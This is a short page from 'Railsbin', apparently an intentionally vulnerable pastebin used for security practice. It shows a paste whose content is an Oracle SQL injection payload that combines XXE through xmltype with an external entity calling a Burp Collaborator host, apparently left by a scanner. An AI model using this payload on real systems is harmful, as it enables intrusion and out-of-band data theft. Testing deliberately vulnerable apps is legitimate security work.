Railsbin – The vulnerable pastebin service!

User:

Title: test

Content:

test'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % vczad SYSTEM "http://pjcbsbss9elo57hlmrvpakaoofufij6bt5hu.burpcollab'||'orator.net/">%vczad;]>'),'/l') from dual)||'

Edit | Back